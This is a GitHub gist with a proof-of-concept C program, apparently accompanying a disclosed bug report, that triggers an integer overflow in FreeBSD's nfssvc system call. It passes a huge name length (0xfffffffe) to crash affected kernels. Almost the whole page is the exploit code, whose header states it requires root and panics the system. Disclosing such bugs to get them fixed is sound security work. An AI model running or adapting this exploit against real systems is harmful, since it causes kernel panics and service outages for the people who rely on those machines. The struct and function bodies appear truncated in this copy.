Skip to content

Instantly share code, notes, and snippets.



Last active Apr 13, 2016
What would you like to do?
FreeBSD nfssvc system call integer overflow
PoC for FreeBSD kernel integer overflow in nfssvc system call
Refer to bug report here:
System call only accessible as root.
Running this test will panic affected versions of FreeBSD.
clang nfssvc.c -o n
- CTurt
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <sys/param.h>
#include <sys/mount.h>
#include <sys/time.h>
#include <nfsserver/nfs.h>
#include <unistd.h>
#define NFSID_INITIALIZE 0x0001
#define NFSSVC_IDNAME 0x00000200
#define NFSSVC_NEWSTRUCT 0x20000000
struct nfsd_idargs {
int nid_flag; /* Flags (see below) */
uid_t nid_uid; /* user/group id */
gid_t nid_gid;
int nid_usermax; /* Upper bound on user name cache */
int nid_usertimeout;/* User name timeout (minutes) */
u_char *nid_name; /* Name */
int nid_namelen; /* and its length */
gid_t *nid_grps; /* and the list */
int nid_ngroup; /* Size of groups list */
int main(void) {
u_char *overflow = malloc(0x4000);
memset(overflow, 'a', 0x4000);
struct nfsd_idargs nid;
nid.nid_flag = NFSID_INITIALIZE;
nid.nid_name = overflow;
nid.nid_namelen = 0xfffffffe;
int result = nfssvc(NFSSVC_IDNAME | NFSSVC_NEWSTRUCT, &nid);
printf("Result: %d\n", result);
printf("Errno: %d\n", errno);
return 0;
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment